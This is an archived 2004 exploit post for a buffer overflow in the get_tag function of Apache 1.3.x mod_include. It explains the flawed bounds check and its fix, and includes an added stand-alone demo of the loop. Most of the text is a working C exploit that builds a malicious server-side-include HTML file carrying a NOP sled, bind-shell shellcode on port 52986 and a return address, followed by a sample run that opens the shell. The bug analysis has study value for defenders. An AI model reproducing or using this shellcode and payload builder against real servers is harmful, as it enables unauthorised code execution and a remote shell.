Apache mod_include_exp

Original post, 2004-10-25 21:09:00
/*********************************************************************************
local exploit for mod_include of apache 1.3.x                                   *
written by xCrZx                         /18.10.2004/                           *
bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
y0das old shao lin techniq ownz u :) remember my words                          *
http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/

/*********************************************************************************
Technical Details:                                                              *
                                                                                 *
there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if \" //                                 *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
As we can see, check [1] is meant to detect the end of the tag buffer, but it    *
only tests for equality and runs once per iteration, while the backslash path    *
writes twice per iteration ([2] and then [4]) unless [3] undoes the first write. *
If t - tag == tagbuf_len - 1 when a backslash arrives, [2] makes it equal to     *
tagbuf_len and [4] makes it tagbuf_len + 1, so [1] never matches again and every *
following byte is written past the end of the buffer.                            *
                                                                                 *
So an attacker who can place such a file on the server can overflow the          *
fixed-size buffer that tag points to and execute arbitrary code with the         *
privileges of the httpd child process.                                           *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: mod_include must be active; this exploit relies on "XBitHack on" in       *
httpd.conf, which makes Apache parse any html file with the user-execute bit     *
set (hence the chmod +x below) as server-side includes.                          *
                                                                                 *
*********************************************************************************/
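The bypass described above, as an added example that is not part of the original exploit or of Apache's source: a stand-alone model of the value-parsing loop of get_tag(), reading from a C string instead of a FILE*, with a 16-byte tag buffer (TAGBUF_LEN) and a guard region after it (GUARD), both sized by me, run once with the original `==` check and once with the proposed `>=` fix. The function and type names (value_loop, build_value, struct result) are mine; the loop body and the [1]..[4] labels follow the listing above.

```c
#include <stdio.h>
#include <string.h>

#define TAGBUF_LEN 16   /* stand-in for Apache's 8192-byte tag[]; the bug does not depend on size */
#define GUARD      32   /* watched bytes after tag[]: any change here is an overflow */

enum check_kind { CHECK_ORIGINAL, CHECK_FIXED };

struct result {
    int returned_null;    /* the bounds check fired and the loop gave up */
    int bytes_stored;     /* final value of t - tag */
    int guard_clobbered;  /* guard bytes overwritten; 0 means no overflow */
};

/* The value-parsing loop quoted from get_tag(), with a C string standing in
 * for the FILE* and a selectable bounds check; the rest of get_tag() (tag name
 * parsing, decoding) is left out. Labels [1]..[4] match the listing above. */
struct result value_loop(const char *in, enum check_kind kind)
{
    char storage[TAGBUF_LEN + 1 + GUARD];   /* tag[], its NUL slot, then the guard */
    char *tag = storage, *t = tag;
    int tagbuf_len = TAGBUF_LEN;
    char c, term;
    struct result r = {0, 0, 0};
    int i;

    memset(storage, 'G', sizeof storage);
    term = *in++;                                    /* opening quote */
    for (;;) {
        c = *in++;
        if (c == '\0') break;                        /* end of input */
        if (kind == CHECK_ORIGINAL ? t - tag == tagbuf_len          /* [1]  */
                                   : t - tag >= tagbuf_len - 1) {   /* [1*] */
            *t = '\0';
            r.returned_null = 1;
            break;
        }
        if (c == '\\') {
            *(t++) = c;                              /* [2] add backslash */
            c = *in++;
            if (c == '\0') break;
            if (c == term)
                *(--t) = c;                          /* [3] only for \" */
        } else if (c == term) {
            break;
        }
        *(t++) = c;                                  /* [4] */
        if (t - tag >= (int)sizeof storage - 1)      /* keep the demo inside storage */
            break;
    }
    if (!r.returned_null) *t = '\0';
    r.bytes_stored = (int)(t - tag);
    for (i = TAGBUF_LEN + 1; i < (int)sizeof storage; i++)
        if (storage[i] != 'G') r.guard_clobbered++;
    return r;
}

/* Build a quoted value (constructed input): 'filler' bytes of 'A', then a
 * backslash and a 'B' (the [2]+[4] double store), then 'trailing' bytes of 'C'
 * that should never be stored. With filler == TAGBUF_LEN - 1 the backslash
 * lands on the critical offset, which is what the exploit's evilpad does.
 * No closing quote is needed. Returns the length written, -1 if out is too small. */
int build_value(char *out, size_t outsz, int filler, int trailing)
{
    int n = 0;
    if ((size_t)(filler + trailing + 4) > outsz) return -1;
    out[n++] = '"';
    memset(out + n, 'A', filler);   n += filler;
    out[n++] = '\\';
    out[n++] = 'B';
    memset(out + n, 'C', trailing); n += trailing;
    out[n] = '\0';
    return n;
}

static void show(const char *label, struct result r)
{
    printf("%-34s null=%d stored=%d guard_clobbered=%d\n",
           label, r.returned_null, r.bytes_stored, r.guard_clobbered);
}

int main(void)
{
    char v[128];

    build_value(v, sizeof v, TAGBUF_LEN - 1, 8);           /* backslash at tagbuf_len - 1 */
    show("critical offset, original check", value_loop(v, CHECK_ORIGINAL));
    show("critical offset, fixed check",    value_loop(v, CHECK_FIXED));

    build_value(v, sizeof v, 5, 30);                       /* backslash anywhere else */
    show("early backslash, original check", value_loop(v, CHECK_ORIGINAL));

    memset(v, 'A', 40); v[0] = '"'; v[40] = '\0';          /* overlong, no backslash */
    show("no backslash, original check",    value_loop(v, CHECK_ORIGINAL));
    return 0;
}
```

Only the first case clobbers the guard: the `==` check is sound for an overlong value without a backslash and for a backslash at any other offset, which is why the exploit has to compute its padding so that the backslash in evilpad arrives at exactly the right byte. With the `>=` check the loop gives up one byte earlier and the double store can never straddle the limit.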

/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/

/*********************************************************************************
  Notes: ha1fsatan - you are a poop-person :))) be co0l as always                *
*********************************************************************************/

/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/

/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

#define EVILBUF 8202        /* total bytes placed in the tag value */
#define HTMLTEXT 1000       /* room for the HTML around the value */

#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"

#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {

    char html[EVILBUF+HTMLTEXT];
    char evilbuf[EVILBUF+2];    /* value plus NUL; +2 keeps the terminator inside the array */

    //can be changed
    char shellcode[] =

    // bind shell on 52986 port
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */


    char NOP[] = "\x90\x40";             // special nops ;) (nop / inc eax, alternated)
    char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;) the leading backslash makes get_tag()
                                         // store two bytes in one iteration ([2] and [4])

    int padding,xpad=0;
    int i;
    unsigned int ret=0xbfff8688;         // 4-byte return address for the 32-bit target

    if(argc>1) ret=strtoul(argv[1],0,16);
    else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }

    // bytes left for the NOP sled once shellcode, evilpad and ret are accounted for
    padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

    // the sled is written two bytes at a time; an odd remainder goes into xpad
    while(1) {
        if(padding%2==0) { padding/=2; break;}
        else {padding--;xpad++;}
    }

    memset(html,0x0,sizeof html);
    memset(evilbuf,0x0,sizeof evilbuf);

    for(i=0;i<padding;i++)
        memcpy(evilbuf+strlen(evilbuf),&NOP,2);
    for(i=0;i<xpad;i++)   // keep the 0x90/0x40 alternation for the odd byte
        memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

    memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);   // copied NUL is overwritten next
    memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
    memcpy(evilbuf+strlen(evilbuf),&ret,sizeof ret);               // little-endian, as on the stack

    sprintf(html,HTML_FORMAT,evilbuf);

    printf("%s",html);

    return 0;
}
